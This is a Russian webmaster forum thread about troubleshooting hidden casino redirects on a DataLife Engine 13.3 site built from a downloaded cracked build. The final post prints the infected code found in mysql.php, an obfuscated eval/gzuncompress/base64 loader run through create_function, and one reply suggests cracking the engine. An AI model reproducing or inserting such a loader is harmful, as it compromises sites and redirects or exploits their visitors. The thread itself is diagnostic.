Вопрос? Вшитая реклама в 13.3

Добрый день, сегодня словил на сайте у себя, что стоит какая-то вшитая реклама, срабатывает если зайти с мобильного с мобильной сети после перехода из поисковой системы и после нажатия на какую либо ссылку открывается новое окно с казино вулкан. В шаблоне все чисто, сборку скачивал здесь на форуме, где искать и что копать?

 

Написать претензию своему оператору связи, либо переходить на https. Это оператор сливает

 

Сайт на HTTPS.

Оператор МТС, с двух телефонов проверял...
Вот такое чудо:

 

PROSTO тогда копай сборку. Никто не обещал, что она будет чистой

 

Понять бы где копать... Так же реклама срабатывает на телефоне с WiFi.

 

не качать сборки, качай чистый DLE и крякай сам (или меняй init.php и что там еще)

 

А почему на форуме сборки не качаешь, вроде чистые. Пробуй с другого операттора, хотя что бы МТС лил на запрет, чет не верится.

 

Качал чистый DLE который byroot выкладывал в соседней ветке, активировал. А сейчас вижу что летит посещаемость вниз и спалил рекламу, льётся на мобилке и не только с мобильно трафика, но и с Wifi...

 

byroot... Юзал его сборки, вроде все ок было. Посмотри через метрику вебвизор, редачит только тебя или юзеров тоже. Может ты на ПК вирусняк поймал. Да и фильтр от яшки за такую фитчу по идее прелитит быстро.

 

Это происходит с телефонов, проверял на 2х iPhone 7+ и X. В разных браузерах.

 

Настрой CSP, если оператор виноват, должно помочь

 

Если у тебя не 0 посешался, через яндекс веб визор увидешь какие операторы сливают, у тебя же юзеры со многих операторов заходят. Ищи не билайн, МТС, мегафон и смотри абонентов. Если в них тоже есть слив, значит скорей всего операторы.

 

Как это отмониторить? Там же не видно куда уходит пользователь вроде как

 

В метрике есть переходы на сайты или чет такое. Но ты смотри веб визор, ты что не знаешь как юрезы себя ведут. Смтри клики, если кликают и остаются на странице значит все ок. Когда мегафоны пускали свои банеры я это в веб визоре запас. Именно мегафон пускал, так как юзеры которые заходили через провайдера мегафон, видели реклу оператора.
Или же пробуй че написал выше mycroft , но он сказал что это для операторов, а если не оператор то не поможет. Поэтому вначале попытайся определить, либо оператор, либо бяка в движке.

 

На всех своих сайтах где стоят сборки byroot 13.2 и 13.3 в метрики вижу переходы со ссылкой rdhveq19 . biz и еще какая-то... Приводят на слив трафика и казино....

 

Тогда не оператор, нужно искать бяку.

 

Проверь сайт этой утилитой (меня спасала не 1 раз) - __find-xss.net/news/article/find-link/

 

Найди прогу которая сравнивает файлы в папке. Скачай весь свой сайт и сравни с оригинальным дистрибутивом. Возможно вам вскрыли сайт и залили рекламу.

 

Проверь файлы engine/data/dbconfig.php engine/classes/mysql.php обычно вредоносный код прячут вверху справа что приходится передвигать ползунок. И да новости проверь в редакторе было такое прямо в бд влили в краткую.

 

Действительно, в файле mysql нашел вот такую хрень:
$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6lVG1v2zYQ/is2IIQS6smOZcd2PGFbC6MLNqxbmqwY2oCgpLPEySIVkqqVjf7vO0rB0mSuv+wLj+S9PXx4d16iICaUDEJCG+0EqO7gFp6RNd/60Ww+/bYyVDGR+dH5YhSdR5Mg0KA1l4LyzPfom3fvfrrajDwF28D5cK3B/Hv/0cM0d0Hw9/d4m0pZcvDd1ei5wavzkeEV+MGr5Xw1X4zImATrA0Z7ESiOyWo6W0yi5YQEUn1Nu1ie1K5OaV3k/8IlF7PVdDJbzi+i1XyGy3IVTebL2cVsGa1m5Ah6R0js0feb69831x+1UQo++yiMbOoalE+4aqjR0Nwj70Fwt/YaxZ8cyPXmt9vN+xt6e31FUNmyqlRtm9/zAoqY8JasvULqkxmMlgWtjSn6+Oo0HgWIGNSTQwEsQ8WjKYm+43ka1pVxBTLWvDBjtytTKNLuKk1DJ3Mlnfgm2ne348u68zDF4FJI3m1Z5yB/JgGKMw2yqzzkC4Vi+0btQKQyQ+7VtjOpmWIVGFDxJ6+Eh71UGbrhQcNZo+Jz9DvyovjLJ53hm15EJ4Ux9eXYPcNxiasr4mANLTfrg9fo/DS9AnJGFejmf5CMNY76WmqfCNg19b1pyzYD02pIDBkR/RcJhnG8ZTsNwZbvgNaNoakUBoTRviua0WND9Vm7U9eJ/vCpmn68ufmV3uKJ/vB288sNues74KtqbIeuSYa1gpxWzKSFT8YJ41ljU2TQIpE7sB+iN9RudoZdCfshB2NxUEBrOaNMpYVlhZSW5xWzr6WxNcdysqxK0PEP9lrJvZUyx0OCyorxXTjmZORoD7AD8QHPcneRw95OWVmGqrGfyzCVfZCwD6zsnhusE8uFNizHnMKdeuCNaRLANUweelQyE7K0zU7mdstSSGRoNXTIHxx0zKZFmFpd8alVSRrahIu8R4mF2WF8DrIOE3yWxoz6oUqktiJTkme24lltQXHQnwYXE1uYlFqZ4G/aP6cVWLTlTKCV4LYupIAnItzkHb6YqSTDMmgwC05g/MmjNo9zt1M9gxizLBOw1xa7I+fasRNvAbKEpaWNkQrZGIuCi7Auasuy6ssdOihmcPj3CBXvU7jdYBgP3OQ7Mjwf5+7i2Jw8HA7/AGdDLmc=')));";$release_this = "cre"."ate_"."function";@$dle_func = $release_this('', "$liciens;");$dle_func('');